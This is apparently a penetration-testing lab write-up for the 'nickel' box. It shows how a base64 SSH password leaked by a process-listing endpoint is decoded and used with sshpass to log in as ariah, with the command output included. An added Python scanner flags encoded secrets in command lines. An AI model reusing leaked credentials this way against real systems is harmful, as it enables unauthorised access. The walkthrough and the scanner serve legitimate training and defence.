SSH
One of the hidden endpoints of the web application on target port 33333, /list-running-procs, lists running processes when it receives a POST request; the process list revealed an SSH credential.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ sshpass -p 'Tm93aXNlU2xvb3BUaGVvcnkxMzkK' ssh ariah@$IP
Permission denied, please try again.
However, authentication fails.
The credential was for the nickel-dev host, which is a different system from the target (nickel).
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 -d
NowiseSloopTheory139
The password turned out to be a base64-encoded string that decodes to NowiseSloopTheory139.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ sshpass -p NowiseSloopTheory139 ssh ariah@$IP
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah> whoami
nickel\ariah
ariah@NICKEL C:\Users\ariah> hostname
nickel
ariah@NICKEL C:\Users\ariah> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.219.99
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.219.254
Validated
Initial foothold established on the target system as the ariah user via SSH.
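The exposure above is a password passed base64-encoded on a process command line. As an added defensive check that is not part of the original writeup, the following sweep flags command-line arguments that are valid base64 and decode to printable text, which is how such a leak would surface in a review of process listings. The sample command lines, paths and the second token are constructed for this example; only the first encoded token is the value shown on the page.

```python
import base64
import binascii
import re

# Constructed sample of process command lines, modelled on what a process-listing
# endpoint returns; the paths, flags and the second token are made up for this example.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"C:\Windows\Temp\Backup.exe -u ariah -p Tm93aXNlU2xvb3BUaGVvcnkxMzkK -h nickel-dev",
    r"C:\Program Files\Agent\agent.exe --token Q29ycmVjdEhvcnNlQmF0dGVyeQ== --log-level debug",
    r"C:\Windows\System32\conhost.exe 0xffffffff -ForceV1",
]

# Base64 alphabet only, at least 16 characters, so short words and flags are ignored.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def decode_if_base64(token: str):
    """Return the decoded text when token is valid base64 that decodes to
    printable ASCII (a likely encoded secret), otherwise None."""
    if not B64_TOKEN.match(token) or len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # `echo` without -n leaves a trailing newline inside the encoded value; drop it.
    text = text.rstrip("\r\n")
    # Ordinary alphanumeric words rarely decode to printable ASCII, so this
    # filters most false positives without needing a word list.
    return text if text and text.isprintable() else None


def find_encoded_secrets(cmdlines):
    """Return (cmdline, token, decoded) for every base64-looking argument that
    decodes to printable text, so each hit can be reviewed for credentials."""
    findings = []
    for line in cmdlines:
        for token in line.split():
            decoded = decode_if_base64(token)
            if decoded is not None:
                findings.append((line, token, decoded))
    return findings


if __name__ == "__main__":
    for line, token, decoded in find_encoded_secrets(SAMPLE_CMDLINES):
        print(f"{token} -> {decoded!r}\n    in: {line}")
```

Feed it the output of the real process listing (for example the command lines returned by the endpoint or by `Get-CimInstance Win32_Process`) and any hit is a credential that should be moved out of process arguments into a protected store.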